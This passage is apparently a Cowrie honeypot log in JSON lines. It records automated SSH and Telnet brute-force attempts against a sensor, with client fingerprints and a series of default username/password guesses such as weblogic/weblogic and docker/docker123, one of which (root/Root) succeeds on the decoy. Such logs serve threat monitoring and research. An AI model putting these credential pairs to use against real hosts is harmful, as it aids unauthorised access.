{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:56.507961Z","src_ip":"212.227.125.160","session":"9561d0b75a85"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"123456","message":"login attempt [testuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:57.183817Z","src_ip":"212.227.125.160","session":"9561d0b75a85"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:58.251557Z","src_ip":"212.227.125.160","session":"9561d0b75a85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42438,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5b755fe47b1","protocol":"ssh","message":"New connection: 212.227.125.160:42438 (1.2.3.4:22) [session: a5b755fe47b1]","sensor":"my-vps","timestamp":"2025-08-26T21:40:02.352999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:02.354274Z","src_ip":"212.227.125.160","session":"a5b755fe47b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:02.398460Z","src_ip":"212.227.125.160","session":"a5b755fe47b1"}
{"eventid":"cowrie.login.failed","username":"user2","password":"123456","message":"login attempt [user2/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:40:02.535691Z","src_ip":"212.227.125.160","session":"a5b755fe47b1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:03.581752Z","src_ip":"212.227.125.160","session":"a5b755fe47b1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54842,"dst_ip":"1.2.3.4","dst_port":22,"session":"06a902b07c2a","protocol":"ssh","message":"New connection: 217.72.205.35:54842 (1.2.3.4:22) [session: 06a902b07c2a]","sensor":"my-vps","timestamp":"2025-08-26T21:40:07.070276Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:07.072498Z","src_ip":"217.72.205.35","session":"06a902b07c2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37830,"dst_ip":"1.2.3.4","dst_port":22,"session":"35ba544b2a8e","protocol":"ssh","message":"New connection: 212.227.125.160:37830 (1.2.3.4:22) [session: 35ba544b2a8e]","sensor":"my-vps","timestamp":"2025-08-26T21:40:08.169487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:08.183975Z","src_ip":"212.227.125.160","session":"35ba544b2a8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:08.218716Z","src_ip":"212.227.125.160","session":"35ba544b2a8e"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-26T21:40:08.399652Z","src_ip":"212.227.125.160","session":"35ba544b2a8e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:09.456472Z","src_ip":"212.227.125.160","session":"35ba544b2a8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33216,"dst_ip":"1.2.3.4","dst_port":22,"session":"922607cf7093","protocol":"ssh","message":"New connection: 212.227.125.160:33216 (1.2.3.4:22) [session: 922607cf7093]","sensor":"my-vps","timestamp":"2025-08-26T21:40:13.550824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:13.558031Z","src_ip":"212.227.125.160","session":"922607cf7093"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:13.601705Z","src_ip":"212.227.125.160","session":"922607cf7093"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:40:13.807918Z","src_ip":"212.227.125.160","session":"922607cf7093"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:15.077437Z","src_ip":"212.227.125.160","session":"922607cf7093"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56840,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3a05ae516fb","protocol":"ssh","message":"New connection: 212.227.125.160:56840 (1.2.3.4:22) [session: e3a05ae516fb]","sensor":"my-vps","timestamp":"2025-08-26T21:40:19.023756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:19.025117Z","src_ip":"212.227.125.160","session":"e3a05ae516fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:19.070626Z","src_ip":"212.227.125.160","session":"e3a05ae516fb"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:40:19.206873Z","src_ip":"212.227.125.160","session":"e3a05ae516fb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:20.255899Z","src_ip":"212.227.125.160","session":"e3a05ae516fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52226,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4cafdeed1b8","protocol":"ssh","message":"New connection: 212.227.125.160:52226 (1.2.3.4:22) [session: c4cafdeed1b8]","sensor":"my-vps","timestamp":"2025-08-26T21:40:24.663663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:24.664942Z","src_ip":"212.227.125.160","session":"c4cafdeed1b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:24.715817Z","src_ip":"212.227.125.160","session":"c4cafdeed1b8"}
{"eventid":"cowrie.login.failed","username":"slurm","password":"slurm","message":"login attempt [slurm/slurm] failed","sensor":"my-vps","timestamp":"2025-08-26T21:40:24.914694Z","src_ip":"212.227.125.160","session":"c4cafdeed1b8"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":57016,"dst_ip":"1.2.3.4","dst_port":22,"session":"00b78eebddfa","protocol":"ssh","message":"New connection: 45.88.8.186:57016 (1.2.3.4:22) [session: 00b78eebddfa]","sensor":"my-vps","timestamp":"2025-08-26T21:40:25.864863Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:25.969175Z","src_ip":"212.227.125.160","session":"c4cafdeed1b8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:26.252534Z","src_ip":"45.88.8.186","session":"00b78eebddfa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:26.253284Z","src_ip":"45.88.8.186","session":"00b78eebddfa"}
{"eventid":"cowrie.login.success","username":"root","password":"Root","message":"login attempt [root/Root] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:40:28.394114Z","src_ip":"45.88.8.186","session":"00b78eebddfa"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:28.972627Z","src_ip":"45.88.8.186","session":"00b78eebddfa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47614,"dst_ip":"1.2.3.4","dst_port":22,"session":"96f2ab4d6803","protocol":"ssh","message":"New connection: 212.227.125.160:47614 (1.2.3.4:22) [session: 96f2ab4d6803]","sensor":"my-vps","timestamp":"2025-08-26T21:40:29.935607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:29.944111Z","src_ip":"212.227.125.160","session":"96f2ab4d6803"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:29.980244Z","src_ip":"212.227.125.160","session":"96f2ab4d6803"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-26T21:40:30.162853Z","src_ip":"212.227.125.160","session":"96f2ab4d6803"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:31.210914Z","src_ip":"212.227.125.160","session":"96f2ab4d6803"}
{"eventid":"cowrie.session.connect","src_ip":"111.23.24.53","src_port":33996,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0a5e5695fc7","protocol":"telnet","message":"New connection: 111.23.24.53:33996 (1.2.3.4:23) [session: f0a5e5695fc7]","sensor":"my-vps","timestamp":"2025-08-26T21:40:31.379252Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43000,"dst_ip":"1.2.3.4","dst_port":22,"session":"75a5e4df1cfe","protocol":"ssh","message":"New connection: 212.227.125.160:43000 (1.2.3.4:22) [session: 75a5e4df1cfe]","sensor":"my-vps","timestamp":"2025-08-26T21:40:35.793053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:35.813963Z","src_ip":"212.227.125.160","session":"75a5e4df1cfe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:40:35.838506Z","src_ip":"212.227.125.160","session":"75a5e4df1cfe"}
{"eventid":"cowrie.login.failed","username":"cyberpanel","password":"cyberpanel","message":"login attempt [cyberpanel/cyberpanel] failed","sensor":"my-vps","timestamp":"2025-08-26T21:40:36.013880Z","src_ip":"212.227.125.160","session":"75a5e4df1cfe"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:40:37.061486Z","src_ip":"212.227.125.160","session":"75a5e4df1cfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38386,"dst_ip":"1.2.3.4","dst_port":22,"session":"955ae3a2ef48","protocol":"ssh","message":"New connection: 212.227.125.160:38386 (1.2.3.4:22) [session: 955ae3a2ef48]","sensor":"my-vps","timestamp":"2025-08-26T21:40:41.344307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:40:41.345092Z","src_ip":"212.227.125.160","session":"955ae3a2ef48"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 